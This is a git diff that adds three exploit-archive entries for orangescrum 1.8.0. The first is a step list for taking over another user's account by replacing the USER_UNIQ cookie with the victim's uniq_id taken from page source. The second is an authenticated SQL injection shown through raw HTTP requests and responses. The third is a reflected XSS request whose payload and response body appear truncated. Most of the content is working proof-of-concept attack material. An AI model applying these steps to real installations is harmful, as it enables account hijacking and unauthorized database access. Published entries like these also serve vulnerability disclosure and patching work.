diff --git a/exploits/multiple/webapps/50551.txt b/exploits/multiple/webapps/50551.txt new file mode 100644 index 000000000..fbe83306d --- /dev/null +++ b/exploits/multiple/webapps/50551.txt @@ -0,0 +1,30 @@ +# Exploit Title: orangescrum 1.8.0 - Privilege escalation (Authenticated) +# Date: 07/10/2021 +# Exploit Author: Hubert Wojciechowski +# Contact Author: snup.php@gmail.com +# Company: https://redteam.pl +# Vendor Homepage: https://www.orangescrum.org/ +# Software Link: https://www.orangescrum.org/ +# Version: 1.8.0 +# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 + +### Privilege escalation + + +# The user must be assigned to the project with the account he wants to take over +# The vulnerabilities in the application allow for: + +* Taking over any account with which the project is assigned + +----------------------------------------------------------------------------------------------------------------------- +# POC +----------------------------------------------------------------------------------------------------------------------- + +## Example + +1. Go to the dashboard +2. Go to the page source view +3. Find in source "var PUSERS" +4. Copy "uniq_id" victim +5. Change cookie "USER_UNIQ" to "USER_UNIQ" victim from page source +6. After refreshing the page, you are logged in to the victim's account \ No newline at end of file diff --git a/exploits/multiple/webapps/50553.txt b/exploits/multiple/webapps/50553.txt new file mode 100644 index 000000000..a8a56398e --- /dev/null +++ b/exploits/multiple/webapps/50553.txt @@ -0,0 +1,133 @@ +# Exploit Title: orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated) +# Date: 28/11/2021 +# Exploit Author: Hubert Wojciechowski +# Contact Author: snup.php@gmail.com +# Company: https://redteam.pl +# Vendor Homepage: https://www.orangescrum.org/ +# Software Link: https://www.orangescrum.org/ +# Version: 1.8.0 +# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 + +### SQL Injection + + +# Authenticated user + +----------------------------------------------------------------------------------------------------------------------- +# POC +----------------------------------------------------------------------------------------------------------------------- + +## Example vuln parameters: + +* project_id +* old_project_id +* uuid +* uniqid +* projid +* id +* caseno + +----------------------------------------------------------------------------------------------------------------------- +----------------------------------------------------------------------------------------------------------------------- + +## Example + +----------------------------------------------------------------------------------------------------------------------- +Req old_project_id=1' - error +----------------------------------------------------------------------------------------------------------------------- + +POST /orangescrum/easycases/move_task_to_project HTTP/1.1 +Origin: http://127.0.0.1 +Content-Length: 64 +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Sec-Fetch-Site: same-origin +Host: 127.0.0.1:80 +Accept: */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 +Connection: close +X-Requested-With: XMLHttpRequest +Sec-Fetch-Mode: cors +Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2 +Referer: http://127.0.0.1/orangescrum/dashboard +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Sec-Fetch-Dest: empty + +project_id=3&old_project_id=2'&case_id=2&case_no=1&is_multiple=0 + +----------------------------------------------------------------------------------------------------------------------- +Res: +----------------------------------------------------------------------------------------------------------------------- + +HTTP/1.1 500 Internal Server Error +Date: Sun, 28 Nov 2021 12:42:30 GMT +Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 +X-Powered-By: PHP/5.6.40 +Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Content-Length: 132182 +Vary: User-Agent +Expires: access 12 month +Connection: close +[...] + +----------------------------------------------------------------------------------------------------------------------- +Req old_project_id=1'' - not error +----------------------------------------------------------------------------------------------------------------------- + +POST /orangescrum/easycases/move_task_to_project HTTP/1.1 +Origin: http://127.0.0.1 +Content-Length: 66 +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Sec-Fetch-Site: same-origin +Host: 127.0.0.1:80 +Accept: */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 +Connection: close +X-Requested-With: XMLHttpRequest +Sec-Fetch-Mode: cors +Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2 +Referer: http://127.0.0.1/orangescrum/dashboard +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Sec-Fetch-Dest: empty + +project_id=3&old_project_id=2'';&case_id=2&case_no=1&is_multiple=0 + +----------------------------------------------------------------------------------------------------------------------- +Res +----------------------------------------------------------------------------------------------------------------------- + +HTTP/1.1 200 OK +Date: Sun, 28 Nov 2021 12:51:23 GMT +Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 +X-Powered-By: PHP/5.6.40 +Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 +Vary: User-Agent +Expires: access 12 month +Content-Length: 1 +Connection: close +Content-Type: text/html; charset=UTF-8 + +0 \ No newline at end of file diff --git a/exploits/multiple/webapps/50554.txt b/exploits/multiple/webapps/50554.txt new file mode 100644 index 000000000..4a045187c --- /dev/null +++ b/exploits/multiple/webapps/50554.txt @@ -0,0 +1,133 @@ +# Exploit Title: orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated) +# Date: 28/11/2021 +# Exploit Author: Hubert Wojciechowski +# Contact Author: snup.php@gmail.com +# Company: https://redteam.pl +# Vendor Homepage: https://www.orangescrum.org/ +# Software Link: https://www.orangescrum.org/ +# Version: 1.8.0 +# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 + +### XSS Reflected + + +# Authenticated user + +----------------------------------------------------------------------------------------------------------------------- +# POC +----------------------------------------------------------------------------------------------------------------------- + +## Example XSS Reflected + +Param: projid +----------------------------------------------------------------------------------------------------------------------- +Req +----------------------------------------------------------------------------------------------------------------------- + +POST /orangescrum/easycases/edit_reply HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 +Accept: */* +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 64 +Origin: http://127.0.0.1 +Connection: close +Referer: http://127.0.0.1/orangescrum/dashboard +Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; CURRENT_FILTER=cases +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +id=5&reply_flag=1&projid=1zxcvczxzxcv"> + +----------------------------------------------------------------------------------------------------------------------- +Res: +----------------------------------------------------------------------------------------------------------------------- + +HTTP/1.1 200 OK +Date: Sun, 28 Nov 2021 13:28:57 GMT +Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 +X-Powered-By: PHP/5.6.40 +Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 +Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 +Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 +Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 +Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 +Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 +Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 +Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 +Content-Length: 1114 +Vary: User-Agent +Expires: access 12 month +Connection: close +Content-Type: text/html; charset=UTF-8 + +
+ + | +
+
+ |